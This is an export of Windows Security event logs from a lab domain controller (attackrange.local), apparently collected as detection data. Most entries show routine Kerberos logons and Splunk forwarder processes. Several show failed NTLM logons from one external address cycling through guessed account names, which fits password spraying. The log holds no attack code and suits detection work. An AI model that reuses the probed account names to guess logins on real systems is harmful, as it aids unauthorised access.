This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:32:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263866
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x774AA2
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51599
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:32:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263865
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x774AA2
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:32:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263873
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x77585E
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:32:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263872
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x77585E
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51609
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:32:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263871
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x77585E
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:33:00 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263874
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: sptservice
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: FreeRDP
Source Network Address: 193.169.255.186
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:33:01 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263875
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: SAAZDEPUSR
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: Windows7
Source Network Address: 193.169.255.186
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:33:02 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263876
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: bwadmin
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: Windows2012
Source Network Address: 193.169.255.186
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:33:03 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263877
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: cbadmin
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: Windows8
Source Network Address: 193.169.255.186
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:33:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263878
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: bwadmin
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: Windows8
Source Network Address: 193.169.255.186
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:33:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263879
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b98
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:33:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263881
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b90
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:33:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263880
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd00
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:33:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263882
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:33:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263883
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x980
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:33:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263885
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xccc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:33:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263884
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a24
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:33:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263888
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x77988F
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:33:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263887
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x77988F
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51622
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:33:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263886
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x77988F
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:34:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263899
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x779CE3
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:34:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263898
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x779DD1
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:34:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263897
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x779E19
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:34:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263896
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x779E93
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51627
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:34:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263895
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x779E93
